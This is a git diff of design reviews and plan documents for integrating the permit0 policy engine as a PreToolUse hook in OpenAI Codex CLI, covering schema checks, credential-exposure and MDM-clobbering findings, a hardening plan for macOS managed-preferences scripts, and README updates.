+the Codex version under `docs/code-reviews/codex-integration/<id>/`."
+
+### Finding 6: Status header lacks plan-doc lineage
+
+**Severity:** Nit
+**Location:** Header
+**Claim:** Header has `**Status:** VERIFIED working against Codex
+0.130.0-alpha.5` and `**Verified date:** 2026-05-10`.
+**Reality:** Other plan docs use `**Status:** Draft | Review | Approved`
+plus `**Depends on:** ...` / `**Blocks:** ...`. The "VERIFIED" status is
+informative but breaks the pattern, and there's no `**Blocks:**` line
+even though `07-packaging.md`'s header says it depends on this doc.
+**Recommendation:** Add `**Blocks:** 07-packaging` and either keep
+"VERIFIED working" as the new status (and update other docs to use the
+same vocabulary) or relabel as "Approved" with the verified-date line
+preserved as proof.
+
+### Finding 7: TUI vs `codex exec` discrepancy could be louder
+
+**Severity:** Nit
+**Location:** "Schema corrections" §4 ("Trust model — the operational
+gotcha")
+**Claim:** Hooks from `~/.codex/config.toml` are silently skipped in
+`codex exec`.
+**Reality:** Excellent finding, captured cleanly. But the table at the
+bottom understates how invisible the failure is — there's no "what to
+look for to confirm this is happening" guidance. A user who sees no
+hook fires in `codex exec` and no error in `--json` output may waste
+hours.
+**Recommendation:** Add to the trust-model section: "Diagnostic: run
+`RUST_LOG=trace codex exec ...` and grep for `hook` in stderr. If you
+see lines like `skipping unverified hook` (or no `hook` lines at all),
+the trust model is the cause." Cross-reference to the trust table.
+
+## Verified Claims
+
+- The verified Codex stdin schema (`session_id`, `turn_id`,
+  `transcript_path`, `cwd`, `hook_event_name`, `model`,
+  `permission_mode`, `tool_name`, `tool_input`, `tool_use_id`) is
+  exactly what `HookInput` accepts modulo the unlisted
+  `permission_mode` field — confirmed at
+  `crates/permit0-cli/src/cmd/hook.rs:252-274`.
+- Empty stdout is correctly emitted as zero bytes, not as a trailing
+  newline — confirmed at `hook.rs:480-491` (`emit_hook_output` skips
+  the println for `OutputFormat::Codex` when `hook_output_to_codex`
+  returns `None`).
+- The HITL → deny mapping with marker is real — `hook_output_to_codex`
+  at `hook.rs:441-471` appends `CODEX_HITL_MARKER` to the reason for
+  any `ask` verdict before wrapping in a deny envelope.
+- `CODEX_THREAD_ID` is honored as a session-ID source in the Codex
+  format branch — `hook.rs:594-614` (`derive_session_id_for_format`).
+- The `[features] codex_hooks` → `[features] hooks` migration is
+  reflected in `03-configuration.md` lines 30-48 (verified via `git diff`
+  and the live file).
+- The `scripts/test-codex-hook.sh` 9-case smoke test exists and
+  exercises `--client codex` shapes against the binary — verified at
+  `/Users/ziyou/Development/permit0/scripts/test-codex-hook.sh:1-187`.
+- The `codex exec` "silent hook skip" trust-model gotcha is consistent
+  with how `dev-test-rig/codex-demo` writes managed prefs at every
+  launch instead of relying on user trust — confirmed at
+  `integrations/permit0-codex/dev-test-rig/codex-demo:74-75`.
+
+## Questions for the Author
+
+1. Is there a story for forward-compat when Codex adds new required
+   fields to the PreToolUse stdin schema in a future release? Today
+   the absence of `#[serde(deny_unknown_fields)]` makes us tolerant,
+   but we don't notice when a new field appears — meaning permit0
+   could miss security-relevant context (e.g. a future
+   `dangerous_action: true` flag). Should there be a logged warning on
+   unknown-field detection?
+2. Should this doc be moved out of `docs/plans/` into
+   `docs/code-reviews/` once it's marked Approved? It's now a verified
+   test report rather than a forward-looking plan, and `07-packaging.md`
+   already depends on it as a stable reference.
+3. Would adding `permission_mode` to the `HookInput` struct
+   (Finding 2) be in scope for the implementation PR that landed the
+   Codex hook, or a separate follow-up?
+4. The "trust model" table lists `cloud_requirements` as "always
+   trusted, workspace-managed". Is there an analogous unattended path
+   on Linux/Windows worth documenting, or is the macOS managed-prefs
+   path the only option for now?

--- a/docs/plan-reviews/codex-integration/a7ebc31f/08-review-packaging.md
+++ b/docs/plan-reviews/codex-integration/a7ebc31f/08-review-packaging.md
@@ -1,0 +1,301 @@
+# Review: 07 — Packaging: Repo Layout and Reusable Artifacts
+
+**Reviewer:** Cursor Agent (a7ebc31f)
+**Plan doc:** `docs/plans/codex-integration/07-packaging.md`
+**Review date:** 2026-05-10
+
+## Verdict
+
+APPROVE WITH COMMENTS
+
+## Summary
+
+The packaging plan correctly identifies Codex as a "shape #2" (CLI flag
++ config, no library to publish) integration and proposes a sensible
+layout that mirrors `integrations/permit0-openclaw/`. Most of the work
+described is **already done on disk** (the `integrations/permit0-codex/`
+tree is fully populated but untracked in git), so this doc reads more
+like a retroactive specification than a forward-looking plan. The main
+issues are: (a) two specific deltas between what the plan promises and
+what's already in the tree (README length and `--uninstall` flag), (b)
+the `integrations/README.md` table format the plan proposes does not
+match the format the existing README uses, (c) the `--shadow` env path
+in `dev-test-rig/codex-demo` symlinks `~/.codex/auth.json` into a world-
+writable `/tmp/` dir, and (d) the `.gitignore` "no rule needed" claim is
+fragile because trace dir is overridable.
+
+## Detailed Findings
+
+### Finding 1: Plan and existing README disagree on `integrations/README.md` table layout
+
+**Severity:** Major
+**Location:** Change 4, "Update `integrations/README.md`"
+**Claim:** Add Codex to the existing single table:
+```markdown
+| [`permit0-codex/`](./permit0-codex/) | [OpenAI Codex CLI]... | — (CLI hook) | `permit0 hook --client codex` | PreToolUse hook in `~/.codex/config.toml` |
+```
+**Reality:** The actual `integrations/README.md` (verified at lines 7-21)
+already has a different structure: a primary table for npm-installable
+packages (one row, OpenClaw) followed by a separate "CLI-hook
+integrations (no separate library; config + docs only)" subsection with
+its own three-column table where Codex is currently listed:
+```markdown
+| Folder | Framework | Hook config lives in |
+|---|---|---|
+| [`permit0-codex/`](./permit0-codex/) | [OpenAI Codex CLI](...) | `~/.codex/config.toml` `[hooks]` or `~/.codex/hooks.json` |
+```
+The existing layout is arguably better (CLI-hook integrations are
+genuinely a different shape than npm packages), but the plan would
+either silently overwrite it or leave both tables stale. The plan's
+"move Codex from the Claude-Code-style bullet into the table" instruction
+also doesn't apply — Codex is no longer in any "Also supported" bullet.
+**Recommendation:** Update Change 4 to reflect what the README already
+does: "Codex is already listed in the CLI-hook integrations table at
+`integrations/README.md:17-19`. No change needed unless we're
+consolidating the two tables." If consolidation is the goal, spell out
+what the merged table should look like.
+
+### Finding 2: `--uninstall` flag claimed but not implemented
+
+**Severity:** Minor
+**Location:** Change 2, third bullet ("`install-managed-prefs.sh` —
+the `defaults write com.openai.codex requirements_toml_base64` recipe
+… Includes a `--uninstall` flag to undo.")
+**Claim:** The script supports `--uninstall` for one-command teardown.
+**Reality:** The committed script at
+`integrations/permit0-codex/examples/install-managed-prefs.sh` has no
+argument parsing at all (verified by reading lines 1-78). It only
+documents the manual command:
+```bash
+# To uninstall:
+#   defaults delete com.openai.codex requirements_toml_base64
+```
+And the help text at the end repeats the same manual command (lines
+71-72). A user who reads the plan and types
+`bash install-managed-prefs.sh --uninstall` will get a re-install of
+the hook (the script ignores `$@`).
+**Recommendation:** Either (a) add the `--uninstall` flag to the
+script (a 5-line `case "${1:-}" in --uninstall) defaults delete ... ;;`
+addition), or (b) remove the claim from Change 2. The same
+`defaults delete` behavior already exists as `dev-test-rig/cleanup`
+(verified at `integrations/permit0-codex/dev-test-rig/cleanup`), so
+option (a) is genuinely useful for the non-rig install path.
+
+### Finding 3: README is 184 lines, plan says "< 80 lines"
+
+**Severity:** Minor
+**Location:** Change 1 ("Short (< 80 lines), user-facing")
+**Claim:** The README is < 80 lines.
+**Reality:** `integrations/permit0-codex/README.md` is 184 lines
+(verified via `wc -l`). The actual file is well-organized and the extra
+length is mostly justified (Setup interactive vs unattended, what
+permit0 intercepts table, behavior under verdict tiers, file-by-file
+listing, code/design pointers), so the bound in the plan is too tight,
+not the README too long.
+**Recommendation:** Either bump the plan's bound to "< 200 lines" or
+drop the line-count constraint. The README is appropriately scoped for
+"setup recipe + behavior contract" — cutting it to 80 lines would force
+removing the verdict-tier behavior table or the file-by-file listing,
+both of which are user-discoverable value.
+
+### Finding 4: `dev-test-rig/codex-demo` symlinks `~/.codex/auth.json` into `/tmp/`
+
+**Severity:** Major
+**Location:** Plan Change 3 (`codex-demo` listed as "no path changes
+beyond REPO_ROOT") — but the underlying script does more than the plan
+implies.
+**Claim:** Plan says "Runtime artifacts (events.log, inv-*/,
+mock-mcp.log, *.sqlite) continue to write to `/tmp/permit0-codex-test/`
+— this keeps the repo clean and `.gitignore` simple. The scripts
+discover and create that directory on first run."
+**Reality:** `integrations/permit0-codex/dev-test-rig/codex-demo:91-92`
+also symlinks `~/.codex/auth.json` and `~/.codex/models_cache.json`
+into `$TRACE_DIR` (default `/tmp/permit0-codex-test/`). The auth.json
+file contains the user's Codex API session credentials. `/tmp/` is
+world-readable on macOS (mode 1777), so any other local user (or
+any process running as a different uid) can dereference the symlink
+and read the credentials. Even on a single-user dev machine this is a
+worse posture than the user's `~/.codex/` (mode 700 by default).
+**Recommendation:** Either (a) place the symlinks under
+`$HOME/.permit0-codex-trace/` (or another user-private dir) by
+default, with `/tmp/permit0-codex-test/` only as an opt-in override,
+or (b) add a security note to the plan and to
+`integrations/permit0-codex/dev-test-rig/README.md` flagging this.
+Option (a) is the safer default; the dev-rig README already mentions
+`PERMIT0_TRACE_DIR=...` as an override.
+
+### Finding 5: `.gitignore` "no rule needed" claim is fragile
+
+**Severity:** Minor
+**Location:** Change 6 (".gitignore entry" — "No actual ignore rule
+needed — the scripts write outside the repo.")
+**Claim:** `dev-test-rig/codex-demo` and `wrap-permit0.sh` write to
+`/tmp/permit0-codex-test/`, which is outside the repo, so no
+`.gitignore` rule is needed.
+**Reality:** Both scripts honor `PERMIT0_TRACE_DIR` (verified at
+`codex-demo:27` and `wrap-permit0.sh:31`). A user who sets
+`PERMIT0_TRACE_DIR=./trace` (or any repo-relative path) will land
+`events.log`, `inv-*/`, `mock-mcp.log`, `config.toml`, `auth.json`
+symlink, etc. inside the repo. With the plan's "comment-only"
+.gitignore, those will all show as untracked changes and risk being
+committed. The repo's `.gitignore` (45 lines, verified) has no
+fallback rules that would catch them either.
+**Recommendation:** Add minimal defensive rules:
+```gitignore
+# Codex integration dev-test-rig runtime data (override-safe)
+**/events.log
+**/mock-mcp.log
+**/inv-[0-9]*-*/
+**/permit0-codex-test/
+```
+Or, alternatively, change the scripts to refuse to start if
+`PERMIT0_TRACE_DIR` resolves to a path inside the repo.
+
+### Finding 6: Plan mixes "to do" and "already done" without indicators
+
+**Severity:** Minor
+**Location:** Whole "Changes" section, plus "Acceptance criteria"
+**Claim:** Each Change is presented as work to perform.
+**Reality:** Verified that all of `integrations/permit0-codex/`
+already exists on disk (matched against the plan's layout diagram
+line by line: README.md ✓, examples/ {config.toml.example ✓,
+hooks.json.example ✓, install-managed-prefs.sh ✓ (without
+`--uninstall`)}, dev-test-rig/ {README.md ✓, codex-demo ✓, watch ✓,
+cleanup ✓, wrap-permit0.sh ✓, mock-gmail-mcp.py ✓, _watch_render.py
+✓}). The plan is descriptive of completed work, not prescriptive.
+That's fine, but the Changes / Acceptance Criteria framing is
+misleading — a reviewer reading top-to-bottom will think the work is
+forthcoming and will miss that the right review question is "did
+the existing implementation match these intents?"
+**Recommendation:** Add a one-line status under "Status: Draft":
+"Implementation status: artifacts on disk under
+`integrations/permit0-codex/`; uncommitted (not yet `git add`-ed)."
+Then optionally convert each Change to a checkbox: `[x] Created`
+with a link to the file, `[ ] Outstanding` only for items still TODO
+(per Findings 1, 2, 5).
+
+### Finding 7: `examples/install-managed-prefs.sh` doesn't reference `dev-test-rig/cleanup`
+
+**Severity:** Minor
+**Location:** Change 2 implicit, examples/install-managed-prefs.sh
+**Claim:** N/A — the plan describes the install script in isolation.
+**Reality:** The install script's help text (lines 61-77) tells the
+user to uninstall via the manual `defaults delete` command. But the
+repo also ships `dev-test-rig/cleanup` (line 1-32, a 32-line script
+that does the same thing with status messages). A user installing
+via `examples/install-managed-prefs.sh` won't necessarily know to
+look in `dev-test-rig/` (which the plan correctly labels as "not for
+end users").
+**Recommendation:** Mention in the plan (and add to the install
+script's help text) that
+`integrations/permit0-codex/dev-test-rig/cleanup` provides a friendlier
+uninstall, OR (better) move a `cleanup-managed-prefs.sh` into
+`examples/` so end users have the symmetric pair without venturing into
+the dev rig.
+
+### Finding 8: "5 minute" acceptance criterion is unverifiable
+
+**Severity:** Nit
+**Location:** Acceptance criteria, first checkbox
+**Claim:** "a user can follow it from zero to a working hook in
+< 5 minutes"
+**Reality:** This is a subjective benchmark with no defined start
+condition (Does "zero" mean no Codex install? No Rust toolchain? No
+permit0 checkout?). `cargo build --release` alone takes more than 5
+minutes from a cold cache on most machines.
+**Recommendation:** Either drop the time bound or make it concrete:
+"Starting from a Codex install + a permit0 checkout with
+`./target/release/permit0` already built, a user can follow the
+README to a working hook in fewer than 10 user-actions (count: copy
+TOML, paste TOML, save, run codex, type /hooks, ...)."
+
+### Finding 9: Header `Blocks: None` ignores future v3 plugin packaging
+
+**Severity:** Nit
+**Location:** Header, "**Blocks:** None"
+**Claim:** Nothing depends on this doc.
+**Reality:** The "Deferred" section explicitly mentions a v3 Codex
+plugin packaging path (`plugin.toml` for `codex plugin install
+permit0`) that would presumably reuse the
+`integrations/permit0-codex/` tree this doc establishes. So future
+plugin work technically depends on this doc's layout decisions.
+**Recommendation:** Either accept "Blocks: None" as "for v1" or
+write `**Blocks:** Future Codex plugin packaging (v3, deferred)`.
+
+### Finding 10: No mention of how the `examples/` configs stay in sync with reality
+
+**Severity:** Nit
+**Location:** Change 2
+**Claim:** Three example files, "each self-contained and
+copy-pasteable."
+**Reality:** Today the examples reproduce the TOML/JSON shape
+verified in `06-real-codex-testing.md`. But there's no mechanism that
+breaks if Codex changes the schema or if our hook adds new flags. The
+synthetic `scripts/test-codex-hook.sh` tests the binary contract but
+doesn't read the examples.
+**Recommendation:** Add an acceptance criterion or a follow-up issue:
+"Lint job parses each `examples/*.{toml,json}.example` to confirm
+syntactic validity and presence of required keys (`[features]`,
+`[[hooks.PreToolUse]]`, `command`). Catches drift cheaply."
+
+## Verified Claims
+
+- The `integrations/permit0-openclaw/` directory is the precedent the
+  plan references — verified its layout (`src/`, `__tests__/`,
+  `package.json`, `README.md`, etc.) at
+  `/Users/ziyou/Development/permit0/integrations/permit0-openclaw/`.
+- All 11 files the plan lists under "Layout" exist at
+  `integrations/permit0-codex/...` — verified via Glob (every plan-listed
+  file is present).
+- `wrap-permit0.sh` correctly derives `REPO_ROOT` via
+  `BASH_SOURCE` walk (lines 27-29 of the actual script), matching the
+  plan's intent. Same pattern in `examples/install-managed-prefs.sh`
+  (lines 21-23) and `dev-test-rig/codex-demo` (lines 22-23).
+- Trace dir override via `PERMIT0_TRACE_DIR` is honored by every
+  rig script — `codex-demo:27`, `wrap-permit0.sh:31`, `watch:12`,
+  `cleanup:19`, `mock-gmail-mcp.py:26`.
+- The `dev-test-rig/codex-demo` script does the right thing for
+  unattended trust: writes `requirements_toml_base64` directly via
+  `defaults write` at every launch (line 74-75) so the on-disk script
+  and the registered hook stay in sync. Matches the trust-model
+  guidance in `06-real-codex-testing.md`.
+- `scripts/test-codex-hook.sh` exists and is unchanged by this plan
+  — verified the file at the documented path; its 9 cases use the
+  `--client codex` flag and exercise the same shapes 06 and 07 rely
+  on.
+- The Codex CLI integration is genuinely a "shape #2" (no library to
+  publish) — confirmed by the absence of any `Cargo.toml`,
+  `package.json`, or `pyproject.toml` under `integrations/permit0-codex/`,
+  unlike `integrations/permit0-openclaw/` which has both
+  `package.json` and `package-lock.json`.
+- `~/.codex/auth.json` symlinking from `dev-test-rig/codex-demo:91`
+  is intentional (login carries over to the isolated `CODEX_HOME`)
+  but the plan doesn't address the security trade-off — see
+  Finding 4.
+- The git status confirms `integrations/permit0-codex/` is untracked
+  (verified via `git status integrations/permit0-codex/`), so
+  Change 1-4's "create" framing reflects the commit boundary, not
+  the on-disk state.
+
+## Questions for the Author
+
+1. Is the plan retroactive (documenting work already done) or
+   prescriptive (specifying what to do next)? Current framing is the
+   latter, but the on-disk state is the former. See Finding 6.
+2. Should `examples/install-managed-prefs.sh` and
+   `dev-test-rig/cleanup` converge on a single `manage-prefs.sh
+   {install,uninstall,status}` script? Today the install path lives
+   in `examples/` (end-user-facing) and the uninstall lives in
+   `dev-test-rig/` (contributor-facing), which is the reverse of what
+   a non-contributor expects. Finding 7.
+3. Is there a Linux story? The plan and 06-real-codex-testing both
+   focus exclusively on macOS managed-prefs. If Codex is single-platform
+   for now, that's fine, but the doc could say so explicitly.
+4. The "Deferred" section mentions Codex's "managed MCP schema
+   wasn't resolvable in the 0.130 binary." Is that issue tracked
+   somewhere (Codex bug, internal note) so we can revisit it without
+   re-discovering the friction?
+5. Should `integrations/permit0-codex/dev-test-rig/` ship a
+   `Makefile` (or `justfile`) so contributors don't have to remember
+   the script names? `make demo` / `make watch` / `make cleanup` is a
+   classic ergonomic win for multi-script rigs.

--- a/docs/plans/codex-integration/03-configuration.md
+++ b/docs/plans/codex-integration/03-configuration.md
@@ -4,6 +4,14 @@
 **Revised:** 2026-05-10
 **Depends on:** 02-implementation
 
+> **User-facing setup lives at [`integrations/permit0-codex/README.md`](../../../integrations/permit0-codex/README.md).**
+> This file is the original planning doc and goes deeper on every config
+> permutation. The integrations folder has the verified, paste-ready
+> setup recipe; copy-paste examples in
+> [`integrations/permit0-codex/examples/`](../../../integrations/permit0-codex/examples/);
+> and the runnable live-demo rig in
+> [`integrations/permit0-codex/dev-test-rig/`](../../../integrations/permit0-codex/dev-test-rig/).
+
 ## Prerequisites
 
 1. Build permit0 from source:

--- a/docs/plans/codex-integration/07-packaging.md
+++ b/docs/plans/codex-integration/07-packaging.md
@@ -1,0 +1,255 @@
+# 07 — Packaging: Hardening and Reconciliation
+
+**Status:** Draft
+**Revised:** 2026-05-10
+**Depends on:** 02-implementation, 06-real-codex-testing
+**Blocks:** None
+
+## Goal
+
+The Codex integration's demo tooling, configuration examples, and
+developer test rig are **already committed** at
+`integrations/permit0-codex/`. The `integrations/README.md` already lists
+Codex in the CLI-hook integrations table. The original-plan
+configuration-doc link is also already in place at the top of
+`docs/plans/codex-integration/03-configuration.md`.
+
+What's left is **hardening** — making the two scripts that mutate global
+macOS state (`install-managed-prefs.sh` and `dev-test-rig/cleanup`) safe
+on a Mac where someone else (e.g. an enterprise MDM) already owns
+`com.openai.codex/requirements_toml_base64`. Today they would silently
+clobber any pre-existing value, which is a real correctness/safety bug.
+
+This is NOT a file-creation or file-move plan. The layout is done.
+
+## Current state (verified 2026-05-10)
+
+```
+integrations/permit0-codex/
+├── README.md                          ✓ exists
+├── examples/
+│   ├── config.toml.example            ✓ exists
+│   ├── hooks.json.example             ✓ exists
+│   └── install-managed-prefs.sh       ✗ unsafe clobber (Change 1)
+└── dev-test-rig/
+    ├── README.md                      ✓ exists
+    ├── codex-demo                     ✗ hard-coded codex path (Change 3)
+    ├── watch                          ✓ exists
+    ├── cleanup                        ✗ unsafe clobber (Change 2)
+    ├── wrap-permit0.sh                ✓ exists
+    ├── mock-gmail-mcp.py              ✓ exists
+    └── _watch_render.py               ✓ exists
+
+integrations/README.md                 ✓ Codex in CLI-hook table
+docs/plans/codex-integration/03-configuration.md
+                                       ✓ already links to examples/
+scripts/test-codex-hook.sh             ✓ 9-case synthetic smoke test
+scripts/test-managed-prefs-roundtrip.sh  ✗ doesn't exist yet (Change 5)
+```
+
+## Changes
+
+### Change 1: Safe managed-preferences installer (P0 — blocker)
+
+**File:** `integrations/permit0-codex/examples/install-managed-prefs.sh`
+
+#### Why
+
+`requirements_toml_base64` is the real macOS managed-config slot that
+enterprise MDMs use to ship hardened Codex policy. The current installer
+overwrites it unconditionally. On a managed Mac this would silently
+destroy the org's policy and replace it with permit0's demo hook. That's
+unacceptable behavior for a script shipped in the repo.
+
+#### Requirements
+
+1. **Detect existing value.** Before writing, check whether the key is
+   already set via
+   `defaults read com.openai.codex requirements_toml_base64 2>/dev/null`.
+
+2. **Stamp permit0 ownership.** When the script does install, the TOML
+   body MUST begin with the marker line
+
+       # permit0-managed: installed by integrations/permit0-codex
+
+   Detection elsewhere checks for this comment to distinguish "ours"
+   from "someone else's."
+
+   *Why this works:* the comment survives because permit0's scripts
+   round-trip the value through `defaults read | base64 -d`, not through
+   Codex's TOML parser. Codex's parser will strip the comment when it
+   loads the requirements, but it never writes the value back to
+   defaults, so the stamp lives in our managed-preferences blob
+   indefinitely. Do not "clean up" the comment thinking it's dead — it
+   is the ownership marker.
+
+3. **Refuse without `--force`.** If a value exists AND lacks the
+   permit0 stamp, the installer prints a warning (showing the first 5
+   lines of the decoded TOML) and exits with status 2. Passing
+   `--force` proceeds anyway after writing a backup.
+
+4. **Backup before overwrite.** On `--force` (or when the existing
+   value IS already permit0-stamped, since a re-install also overwrites),
+   save the prior decoded TOML to
+
+       ~/.permit0/managed-prefs-backup-<YYYYMMDD-HHMMSS>.toml
+
+   The timestamp goes in the **filename** so successive `--force` runs
+   create distinct backups instead of overwriting each other.
+
+5. **`--uninstall` flag.** When passed:
+   - If the current value bears the permit0 stamp → delete the key.
+   - Then if any `~/.permit0/managed-prefs-backup-*.toml` files exist,
+     restore the **most recent** one (by mtime) via
+     `defaults write ... -string "$(cat ... | base64)"`. Tell the user
+     which backup was restored.
+   - If the current value lacks the permit0 stamp → print
+     "managed-prefs value present but not stamped by permit0; refusing
+     to delete. Use `--force` if you really want to remove it." and exit
+     non-zero.
+   - If the key is absent → print "(already absent)" and exit 0.
+
+6. **Help text.** Add a `--help` flag that prints usage including
+   `--force` and `--uninstall`.
+
+### Change 2: Safe cleanup in dev-test-rig (P0 — blocker)
+
+**File:** `integrations/permit0-codex/dev-test-rig/cleanup`
+
+#### Why
+
+Same root cause as Change 1. The current cleanup does an unconditional
+`defaults delete com.openai.codex requirements_toml_base64`, which would
+also wipe an org's MDM-installed policy if the demo was run on a managed
+Mac.
+
+#### Requirements
+
+1. Read the existing value (if any) and decode it.
+2. **If the value bears the permit0 stamp** → delete the key.
+3. **If the value exists but lacks the stamp** → print a warning showing
+   the first 5 lines of the decoded TOML, refuse to delete, and exit
+   non-zero. Document that `--force` overrides this guard.
+4. **If `--force` is passed** → delete the key unconditionally (this is
+   the only way to recover from a stale unstamped value).
+5. **If the key is absent** → print "(already absent)" as today.
+6. After deletion, if `~/.permit0/managed-prefs-backup-*.toml` exists,
+   inform the user with the same "restore via install-managed-prefs.sh
+   --uninstall" path so they have one canonical way to recover backups.
+
+### Change 3: Codex binary path fallback in codex-demo (P2 — UX)
+
+**File:** `integrations/permit0-codex/dev-test-rig/codex-demo`
+
+The current script hard-codes `/Applications/Codex.app/Contents/Resources/codex`.
+This is the verified path for the macOS desktop app, but users who
+installed Codex via `npm install -g @openai/codex` (or on Linux) hit a
+silent failure.
+
+Revised resolution order (most portable first):
+
+```bash
+CODEX="${CODEX:-}"
+if [[ -z "$CODEX" ]]; then
+    if command -v codex >/dev/null 2>&1; then
+        CODEX="$(command -v codex)"
+    elif [[ -x /Applications/Codex.app/Contents/Resources/codex ]]; then
+        CODEX=/Applications/Codex.app/Contents/Resources/codex
+    else
+        echo "error: Codex binary not found." >&2
+        echo "  Set CODEX=/path/to/codex or install Codex." >&2
+        exit 2
+    fi
+fi
+```
+
+`$CODEX` env override remains the highest-priority option. PATH lookup
+comes before the bundle path because it's portable beyond macOS; on
+macOS both typically resolve to the same binary anyway.
+
+### Change 4: Round-trip integration test (P1 — test)
+
+**File:** `scripts/test-managed-prefs-roundtrip.sh` (new)
+
+A script that mutates global system state needs an integration test.
+The test must:
+
+1. **Save the live value before starting** so the test never destroys
+   the developer's real config. Stash it in
+   `/tmp/permit0-mp-test-preserved-<pid>.b64` and restore on EXIT trap
+   (success or failure).
+
+2. **Phase A — refuse to clobber:**
+   - Plant a sentinel value (e.g.
+     `# fake-mdm\nfeatures.hooks = false\n` base64'd) via `defaults write`.
+   - Run `install-managed-prefs.sh` without `--force`; assert exit
+     status ≠ 0 and stderr mentions "stamp".
+   - Assert the sentinel value is unchanged after the failed install.
+
+3. **Phase B — `--force` backs up and overwrites:**
+   - With the sentinel still in place, run with `--force`.
+   - Assert exit status = 0.
+   - Assert `~/.permit0/managed-prefs-backup-*.toml` now exists and its
+     content matches the sentinel.
+   - Assert the new value contains the permit0 stamp marker.
+
+4. **Phase C — `--uninstall` restores backup:**
+   - Run `install-managed-prefs.sh --uninstall`.
+   - Assert the live value matches the sentinel again (backup
+     restored).
+   - Assert exit status = 0.
+
+5. **Phase D — uninstall on unstamped value refuses:**
+   - With the sentinel in place (no permit0 stamp), run `--uninstall`.
+   - Assert exit status ≠ 0 and the value is preserved.
+
+6. Cleanup runs via EXIT trap regardless of outcome.
+
+The script gates on macOS (`uname -s` = Darwin); otherwise prints
+"skipped on non-macOS" and exits 0 so CI on Linux is unaffected.
+
+## Dropped from the plan
+
+- **Original Change 4 (link from `03-configuration.md` to examples/):**
+  Already present at the top of `03-configuration.md` since the
+  integrations folder was created. Verified 2026-05-10. No further
+  change needed.
+
+- **README.md table update:** Already done. Codex is in the CLI-hook
+  table at `integrations/README.md`. No further change needed.
+
+- **File creation/move:** Already done.
+
+- **`.gitignore` comment for `/tmp/permit0-codex-test/`:** Adds no value;
+  the dir is outside the repo tree.
+
+## Acceptance criteria
+
+- [ ] `install-managed-prefs.sh` refuses to overwrite an unstamped
+      existing `requirements_toml_base64` value without `--force` (exit
+      ≠ 0, warning shown)
+- [ ] `install-managed-prefs.sh` stamps its TOML body with
+      `# permit0-managed: installed by integrations/permit0-codex`
+- [ ] `install-managed-prefs.sh` with `--force` creates a timestamped
+      backup at `~/.permit0/managed-prefs-backup-<YYYYMMDD-HHMMSS>.toml`
+- [ ] `install-managed-prefs.sh --uninstall` deletes only permit0-stamped
+      values and restores the most-recent backup (by mtime)
+- [ ] `install-managed-prefs.sh --help` documents `--force` and
+      `--uninstall`
+- [ ] `dev-test-rig/cleanup` refuses to delete unstamped values, accepts
+      `--force` to override
+- [ ] `dev-test-rig/codex-demo` discovers Codex via `$CODEX`, then
+      PATH, then the macOS app-bundle path; exits 2 with a helpful
+      message if none found
+- [ ] `scripts/test-managed-prefs-roundtrip.sh` exists and passes on
+      macOS (gracefully skips on Linux)
+- [ ] `scripts/test-codex-hook.sh` still passes (unchanged)
+- [ ] `cargo test --all-targets` still passes (no Rust changes)
+
+## Deferred
+
+- Codex plugin manifest (`plugin.toml`) for `codex plugin install permit0` (v3)
+- Codex Cloud sidecar packaging (v3, see `05-limitations.md`)
+- Adding `[mcp_servers]` to managed requirements (schema unresolved in
+  Codex 0.130)
+- npm/pip package publication (shape #2 doesn't need one)

--- a/integrations/README.md
+++ b/integrations/README.md
@@ -8,9 +8,16 @@ Reusable, framework-native packages that integrate permit0 with specific agent f
 |---------|-----------|----------|---------|---------|
 | [`permit0-openclaw/`](./permit0-openclaw/) | [OpenClaw](https://github.com/openclaw/openclaw) | TypeScript | `npm install @permit0/openclaw` | `permit0Middleware(...)` over the gateway dispatch (recommended); `permit0Skill(...)` HOF for advanced cases |
 
-### Also supported, different shape
+### CLI-hook integrations (no separate library; config + docs only)
 
-- **[Claude Code](https://docs.claude.com/en/docs/claude-code/overview)** — gated via `permit0 hook`, a CLI subcommand of the `permit0` binary that's invoked from Claude Code's `PreToolUse` hook in `~/.claude/settings.json`. No separate package; the integration ships with the workspace.
+These frameworks expose a tool-invocation hook of their own. permit0 plugs
+in via the same `permit0 hook` CLI subcommand with a `--client` flag — no
+library to publish, just a copy-paste config block.
+
+| Folder | Framework | Hook config lives in |
+|---|---|---|
+| [`permit0-codex/`](./permit0-codex/) | [OpenAI Codex CLI](https://developers.openai.com/codex) | `~/.codex/config.toml` `[hooks]` or `~/.codex/hooks.json` |
+| — (no folder yet) | [Claude Code](https://docs.claude.com/en/docs/claude-code/overview) | `~/.claude/settings.json` `PreToolUse` |
 
 ## The wrapper pattern in one sentence
 
@@ -23,6 +30,7 @@ Every integration follows the same three-step pattern, regardless of language:
 What changes between integrations is *how* you hook in:
 
 - **OpenClaw (TypeScript)** → compose `permit0Middleware(...)` over the gateway dispatch — OpenClaw routes every skill through that chain, so one composition gates all of them. The per-skill `permit0Skill(...)` HOF is the underlying primitive, available for advanced cases. See [`permit0-openclaw/`](./permit0-openclaw/).
+- **OpenAI Codex CLI** → wire `permit0 hook --client codex` as a `PreToolUse` hook in `~/.codex/config.toml`; gates every Bash, `apply_patch`, and MCP tool call before Codex runs it. See [`permit0-codex/`](./permit0-codex/).
 - **Claude Code (CLI)** → wire `permit0 hook` as a `PreToolUse` hook in `~/.claude/settings.json`; the hook adjudicates every built-in and MCP tool call before Claude Code runs it.
 - **CrewAI** → subclass `crewai.tools.BaseTool` and override `_run`.
 - **OpenAI Agents SDK** → wrap around the `@function_tool` decorator.

--- a/integrations/permit0-codex/README.md
+++ b/integrations/permit0-codex/README.md
@@ -1,0 +1,183 @@
+# permit0-codex
+
+Gate every tool call OpenAI Codex makes — Bash, `apply_patch`, MCP servers —
+through the permit0 policy engine.
+
+This integration has no library code: it's a `permit0 hook --client codex`
+CLI subcommand that ships in the `permit0` binary, plus a config recipe.
+Same shape as the [Claude Code integration](../../docs/plans/codex-integration/00-overview.md).
+The whole flow:
+
+```
+Codex agent turn
+   ↓
+Model proposes a tool call (Bash, apply_patch, mcp__<server>__<tool>)
+   ↓
+Codex fires PreToolUse hook → spawns `permit0 hook --client codex`
+   ↓
+permit0 normalizes the tool call through packs, scores it, returns
+either empty stdout (no objection) or a deny envelope
+   ↓
+Codex either runs the tool or blocks it with permit0's reason
+```
+
+## Prerequisites
+
+- macOS (the auto-trust setup uses macOS managed preferences). Linux/Windows
+  paths exist but aren't covered here yet.
+- [Codex CLI](https://developers.openai.com/codex) installed (verified
+  against 0.130.0-alpha.5 from `/Applications/Codex.app`)
+- This repo checked out and built:
+
+  ```bash
+  cargo build --release
+  # produces ./target/release/permit0
+  ```
+
+## Setup (production-ish)
+
